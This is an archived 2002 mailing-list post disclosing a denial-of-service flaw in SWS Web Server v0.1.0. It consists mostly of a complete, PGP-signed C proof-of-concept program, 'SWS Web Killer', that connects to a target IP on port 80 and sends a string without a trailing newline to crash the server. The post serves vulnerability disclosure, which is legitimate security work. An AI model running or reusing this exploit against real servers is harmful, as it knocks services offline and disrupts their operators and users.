OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
saman_at_hush.com
Date: Mon Sep 02 2002 - 13:04:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    /*
     * Mon Sep 2 17:45:04 2002
     *
     * |SaMaN| aka Mert <samanhush.com>
     *
     * Information : Anyone can kill SWS Web Server v0.1.0 remotely.
     *
     * Proof of Concept Exploit for SWS Web Server v0.1.0
     *
     * SWS homepage : http://www.linuxprogramlama.com
     *
     * Tested on : Slackware 8.1 - 2.4.18
     * : Redhat 7.0 - 2.2.16-22
     *
     * Problem : sws_web_server.c
     * : line 108
     * : if (recvBuffer[i - 1] != '\n') break;
     *
     * Q : So what will happen when we send a string not end with '\n' ?
     * A : break break break
     * Q : So root should restart web server everytime ?
     * A : Yes
     * Q : Other web servers act like this ?
     * A : No
     * Q : So something is wrong ?
     * A : Yes :)
     *
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define K "\033[1;31m"
    #define Y "\033[1;32m"
    #define SA "\033[1;33m"
    #define M "\033[1;34m"

    #define PORT 80

    int main(int argc, char *argv[])
    {
       int sockfd, numbytes;
       struct hostent *adres;
       struct sockaddr_in hedef;

       char buf[8] = "|SaMaN|";

       if (argc != 2) {
          printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
          printf("%sSWS Web Killer (samanhush.com) \n", SA);
          printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
          printf("%sUsage: ./sws_web_killer %s<IP> \n",Y,M);
          return 0;
       }

       if ((adres=gethostbyname(argv[1])) == NULL) {
          perror("gethostbyname");
          exit(1);
       }

       if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
          perror("socket");
          exit(1);
       }

       hedef.sin_family = AF_INET;
       hedef.sin_port = htons(PORT);
       hedef.sin_addr = *((struct in_addr *)adres->h_addr);
       memset(&(hedef.sin_zero), '\0', 8);

       if (connect(sockfd, (struct sockaddr *)&hedef,
                                         sizeof(struct sockaddr)) == -1)
       {
            perror("connect");
            exit(1);
       }

       if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
            perror("send");
            exit(1);
       }

       close(sockfd);

       return 0;
    }

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wlYEARECABYFAj1zqVwPHHNhbWFuQGh1c2guY29tAAoJEAH/SwbH8cXFjRIAniyG5sTp
    9dPQOfCYbPdtlwHYawc8AKCSvQ23yBZszI97DmMt+maxaqgqOg==
    =tmWT
    -----END PGP SIGNATURE-----

    Get your free encrypted email at https://www.hushmail.com